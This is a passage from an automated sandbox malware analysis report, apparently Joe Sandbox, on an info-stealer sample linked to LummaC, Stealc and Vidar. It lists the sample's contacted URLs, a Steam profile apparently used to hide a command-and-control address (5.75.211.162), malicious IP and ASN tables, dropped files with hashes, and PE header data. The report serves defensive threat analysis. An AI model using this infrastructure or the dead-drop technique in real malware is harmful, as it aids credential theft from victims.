                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/mobileRegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://steamcommunity.com/76561199780418869[1].htm.3.drtrue
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=englishRegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.entrust.net/2048ca.crl0file.exefalse
                        • URL Reputation: safe
                        unknown
                        https://5.75.211.162BKFCBRegAsm.exe, 00000003.00000002.2183942555.0000000000582000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=englRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.entrust.net/rpa0file.exefalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/about/76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        104.102.49.254
                        steamcommunity.comUnited States
                        16625AKAMAI-ASUStrue
                        5.75.211.162
                        unknownGermany
                        24940HETZNER-ASDEtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1519653
                        Start date and time:2024-09-26 19:48:08 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 13s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:11
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@7/9@1/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 43
                        • Number of non-executed functions: 60
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.189.173.22
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe
                        TimeTypeDescription
                        13:49:38API Interceptor1x Sleep call for process: RegAsm.exe modified
                        13:49:50API Interceptor1x Sleep call for process: WerFault.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        104.102.49.254file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          file.exeGet hashmaliciousVidarBrowse
                            file.exeGet hashmaliciousUnknownBrowse
                              3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                  Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                      HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                        bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                          HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                            5.75.211.162file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              file.exeGet hashmaliciousVidarBrowse
                                                file.exeGet hashmaliciousUnknownBrowse
                                                  Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              steamcommunity.comfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 104.102.49.254
                                                              file.exeGet hashmaliciousVidarBrowse
                                                              • 104.102.49.254
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 104.102.49.254
                                                              HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              AKAMAI-ASUSXerox-029_Scanned.pdfGet hashmaliciousPhisherBrowse
                                                              • 23.195.92.153
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 104.102.49.254
                                                              file.exeGet hashmaliciousVidarBrowse
                                                              • 104.102.49.254
                                                              phish_alert_sp2_2.0.0.0(10).emlGet hashmaliciousHTMLPhisherBrowse
                                                              • 184.28.90.27
                                                              https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                                                              • 88.221.169.152
                                                              https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylinkGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                              • 2.16.202.91
                                                              Final_Contract_Copy-532392974.pdfGet hashmaliciousUnknownBrowse
                                                              • 23.56.162.185
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              Final_Contract_Copy-532392974.pdfGet hashmaliciousUnknownBrowse
                                                              • 23.203.104.175
                                                              https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylinkGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                              • 2.19.126.78
                                                              HETZNER-ASDEfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousVidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              g3V051umJf.htmlGet hashmaliciousUnknownBrowse
                                                              • 195.201.215.225
                                                              https://iskiosvillas.gr/booking/AAMAyYwBGAAAAAAB2B1ZmTNuNBwBbZXOiMVmgTZdxswVIV.htmlGet hashmaliciousUnknownBrowse
                                                              • 78.46.90.29
                                                              Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                              • 88.198.19.212
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              https://is.gd/fxcRirGet hashmaliciousUnknownBrowse
                                                              • 168.119.146.39
                                                              https://bostempek.vercel.app/Get hashmaliciousPorn ScamBrowse
                                                              • 136.243.69.157
                                                              https://312d5c44.flca.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                              • 195.201.57.90
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousVidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 5.75.211.162
                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 5.75.211.162
                                                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 104.102.49.254
                                                              file.exeGet hashmaliciousVidarBrowse
                                                              • 104.102.49.254
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              e.dllGet hashmaliciousDridex DropperBrowse
                                                              • 104.102.49.254
                                                              e.dllGet hashmaliciousDridex DropperBrowse
                                                              • 104.102.49.254
                                                              Payment copy.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 104.102.49.254
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                                                              • 104.102.49.254
                                                              PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                                              • 104.102.49.254
                                                              PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                                              • 104.102.49.254
                                                              No context
                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):65536
                                                              Entropy (8bit):1.1831077443001623
                                                              Encrypted:false
                                                              SSDEEP:192:sg3tvTeFy/K+j0Nvw4Mjez/Zr80uUUzuiFAZ24IO8Z:sQHK+QNvw5jeKKUzuiFAY4IO8Z
                                                              MD5:54EDCCC8C342BFB68D82E9198E7414DE
                                                              SHA1:F769DE24108465D5A8969986F80215CF6FEB3A93
                                                              SHA-256:E86FDD6CB68726DB6BCCB6DA89CC3F4436086B4DAC00369B0F7C006A758DFB56
                                                              SHA-512:23C9CC1624935440683317460FF15B33F35C3A7F45AFE6EDAB35F21F16BE2D6053BDA2A6772EB1A5DC5717C06D6498174A37729D3D1F9EA641CEE11CAE221524
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.4.6.5.7.8.6.5.7.0.1.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.8.4.6.5.7.9.2.9.7.6.3.7.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.a.0.9.6.0.5.-.2.c.c.1.-.4.c.2.6.-.9.c.f.8.-.a.2.4.a.c.a.7.9.2.5.3.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.4.0.4.e.e.e.-.8.5.0.c.-.4.a.5.d.-.8.4.c.3.-.3.3.3.8.0.7.7.e.3.1.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.2.c.-.0.0.0.1.-.0.0.1.4.-.4.3.3.6.-.f.3.6.3.3.c.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.
                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 26 17:49:38 2024, 0x1205a4 type
                                                              Category:dropped
                                                              Size (bytes):167536
                                                              Entropy (8bit):1.7732000115222502
                                                              Encrypted:false
                                                              SSDEEP:768:ddpQu5HF5SqKDsOQw1J933aqlvw52mJwNA/HBSp:dXrwDsA1JheeYHBSp
                                                              MD5:A7DAB80D8FD3A5D1D279BE37425D5017
                                                              SHA1:7027BF644D81CE0F878FC687C141AB284B235F27
                                                              SHA-256:C016391F5AA48D651B3AEED7A5ADF9FC149E7A9843FFF824173E89AD2829277D
                                                              SHA-512:A94ECE5EBE5179FEB653FAA70DA9B656CEE7B4F02B38A1EDBB04569429F73EBE4810732B10B46965BF6D7C6E40CAD99BE1DE590A1A7F8E55615F8922A890B4C7
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:MDMP..a..... ..........f........................."..(.......$....+......d...TY..........`.......8...........T...........`U...9...........+...........-..............................................................................eJ......l.......GenuineIntel............T.......,......f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):6304
                                                              Entropy (8bit):3.714928989980564
                                                              Encrypted:false
                                                              SSDEEP:96:RSIU6o7wVetbEI6xYvJ1QQck2K5aM4Up89bi2sf32m:R6l7wVeJEI6xYvJWQWiprp89bi2sf32m
                                                              MD5:D63FB61EB1B71E3AC7CA1FA97EF706B1
                                                              SHA1:FEB0830EDBE70A5382536E1053CFEE8843097C59
                                                              SHA-256:B40AAF5A49BB182A60BAFDA2B0DFDFCD5957BE54CBE2D9393AF697BF9E87752B
                                                              SHA-512:01443BCE7621C25DBDBEBEA104B0901022C984026D716A86FDC1920873A88E7C967B91757AC36FA3ABAC93A41FDA7FF4502FDAC5EA895425AA151AFC726E29DE
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.7.6.<./.P.i.
                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):4636
                                                              Entropy (8bit):4.444488419661934
                                                              Encrypted:false
                                                              SSDEEP:48:cvIwWl8zsEJg77aI9UfWpW8VYjt9Ym8M4Jfu4nFH+q8oTqQgLuOLuKrd:uIjfCI7aO7VacJfuSvmBukuKrd
                                                              MD5:DBCE20F3B3558C1E6A26F07FC7C4C731
                                                              SHA1:35389F6B08484AB1F3D5F31D5A02045594FE9109
                                                              SHA-256:CAFF8E9A32079310D7E828F2460DDD11140AAAB33C66210BBCA5DE5DD8B655D4
                                                              SHA-512:E0273DF4141FBEF87B45C2D23CC9B9895CE4E363B3AA628E2EB87078BA4B59879973121C76AD3C76FED14C63B175F82E18B5B2038203019C3BA1CBD486D2900E
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517492" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                              Process:C:\Users\user\Desktop\file.exe
                                                              File Type:CSV text
                                                              Category:modified
                                                              Size (bytes):425
                                                              Entropy (8bit):5.353683843266035
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                              MD5:859802284B12C59DDBB85B0AC64C08F0
                                                              SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                              SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                              SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):34725
                                                              Entropy (8bit):5.398405402490007
                                                              Encrypted:false
                                                              SSDEEP:768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sw:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFx
                                                              MD5:F6B10322E08A95D30EEF39D0EC75514F
                                                              SHA1:9D7E2F09A02BA4E3FADD02BBFCC6BF4B9617AF50
                                                              SHA-256:2624CFEC0601E354D516EFC40D8EF1EEA54393599D8DB8361D873CF33E2C2375
                                                              SHA-512:0DAF608649E2F05582B075529A923849BFF99F8EEF713EF55B72AFE7358FB241E2F0CCF4BFFF69EB9380346847F44413BAFA7F7D4D475E545BD4A8A1A7350216
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):1048575
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:7B6:7s
                                                              MD5:CD0241B19FC162810B53D6C9D6EB3DEF
                                                              SHA1:04A7B4F0F599D0C739BBD367CE7587024E26FE92
                                                              SHA-256:F8DD2C93C493A3B940C95480D4B9AA8DB77909BD80FAE6B48B118CC59D3A9E79
                                                              SHA-512:03358054904B679D7A267ABFA6640D6E9E682FFB18A034A2EA32BE43299517A6F353ED1B3C661B6C8570EBBB74AFA6C97F162F67EBE41BFB87BE89054A14B0C8
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                              File Type:MS Windows registry file, NT/2000 or above
                                                              Category:dropped
                                                              Size (bytes):1835008
                                                              Entropy (8bit):4.466322573580201
                                                              Encrypted:false
                                                              SSDEEP:6144:VIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNmdwBCswSb+:WXD94zWlLZMM6YFH8++
                                                              MD5:6EBC279C52E49E88C903B82572FD756E
                                                              SHA1:B14864D1CF6A9D3845D65CD9B5FD33518FC03177
                                                              SHA-256:AC0955DC79A1942EA15946B10791473574DED75EA74D5C5C8D16B0334F019067
                                                              SHA-512:9FA094031738135A3EB6F8B755FCC482BBBFCF1E8AA23540412F2661C3D9562505920F3526BEE7FFCD0B77D8EF4C1602E25AC007505897A85EC06E5EC4C75E22
                                                              Malicious:false
                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...u<................................................................................................................................................................................................................................................................................................................................................h.A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\file.exe
                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):33
                                                              Entropy (8bit):2.2845972159140855
                                                              Encrypted:false
                                                              SSDEEP:3:i6vvRyMivvRya:iKvHivD
                                                              MD5:45B4C82B8041BF0F9CCED0D6A18D151A
                                                              SHA1:B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
                                                              SHA-256:7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
                                                              SHA-512:B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
                                                              Malicious:false
                                                              Preview:0..1..2..3..4..0..1..2..3..4.....
                                                              File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.989396884849224
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:file.exe
                                                              File size:413'224 bytes
                                                              MD5:4453d7bc66e29c48ed6495bfa820e5b5
                                                              SHA1:da622e588d635bbadd7ff04ad3df5db191ff0549
                                                              SHA256:941e7002f11290e3ed9dd99d8cc0abc62f6cf69b923ae30b89741579854a8a70
                                                              SHA512:d23950922301cf5cf2e489e5d50e76f2b92ee0b02a4ec3cff532cce72ff3e86a4668d65431402b772570bc9a6d6991f7e6848991e9a66ecb2227ce4b4d5d6306
                                                              SSDEEP:6144:hReQugxZ1Af9bSqoU5GMSUfoVs6ZPTl0ocTpSqN8r2JNrHzJGGO78M6p+z3ZLq2Z:huXSqoUM2qsQJ28SvrE6wLq2syEO
                                                              TLSH:F494231D264E051BD9E647F070E6F90ABE72B44F6ADAE13FF0A6B919B555310032F870
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................
                                                              Icon Hash:90cececece8e8eb0
                                                              Entrypoint:0x463c3e
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows cui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x66F591A9 [Thu Sep 26 16:54:01 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
